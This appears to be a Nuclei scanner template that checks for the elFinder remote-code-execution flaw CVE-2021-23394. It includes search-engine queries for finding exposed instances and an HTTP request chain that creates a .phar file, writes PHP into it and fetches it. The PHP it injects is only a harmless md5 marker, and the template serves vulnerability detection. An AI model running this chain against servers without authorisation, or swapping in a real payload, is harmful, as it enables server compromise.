id: CVE-2021-23394

info:
  name: elFinder < 2.1.58 - Remote Code Execution
  author: 0xanis
  severity: high
  description: |
    studio-42/elfinder before 2.1.58 contains a remote code execution caused by execution of PHP code in a .phar file, letting attackers execute arbitrary PHP code if the server parses .phar files as PHP, exploit requires server to parse .phar files as PHP.
  impact: |
    Attackers can execute arbitrary PHP code on the server, potentially leading to full server compromise.
  remediation: |
    Update to version 2.1.58 or later.
  reference:
    - https://github.com/Studio-42/elFinder/issues/3295
    - https://blog.sonarsource.com/elfinder-the-story-of-a-file-manager-and-a-bunch-of-vulnerabilities
    - https://snyk.io/vuln/SNYK-PHP-STUDIO42ELFINDER-1290554
    - https://nvd.nist.gov/vuln/detail/CVE-2021-23394
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2021-23394
    cwe-id: CWE-434
    epss-score: 0.76848
    epss-percentile: 0.98975
    cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: std42
    product: elfinder
    shodan-query: http.title:"elfinder"
    fofa-query: title="elfinder"
    google-query: intitle:"elfinder"
  tags: cve,cve2021,elfinder,rce,phar,file-upload,intrusive,vkev

variables:
  filename: "{{randstr}}"
  payload_str: "{{randstr}}"

http:
  - raw:
      - |
        GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{filename}}.phar HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, 'isowner', 'createext', 'added')
          - contains(content_type, 'application/json')
          - status_code == 200
        condition: and
        internal: true

    extractors:
      - type: json
        name: hash
        part: body
        json:
          - ".added[0].hash"
        internal: true

  - raw:
      - |
        GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content=<?='';+echo+md5('{{payload_str}}');+?> HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, 'isowner', 'phash', 'changed')
          - contains(content_type, 'application/json')
          - status_code == 200
        condition: and
        internal: true

  - raw:
      - |
        GET /elFinder/files/{{filename}}.phar HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "{{md5(payload_str)}}"
# digest: 4a0a004730450221009df426bc0310e8f1a191247b136d3c77ff9e99fbd678b10c2339796e95a8ba7b0220717382b7457e2f2a78b407fb951ce59f36a466f8f022e2033791f59b4170de94:922c64590222798bb761d5b6d8e72950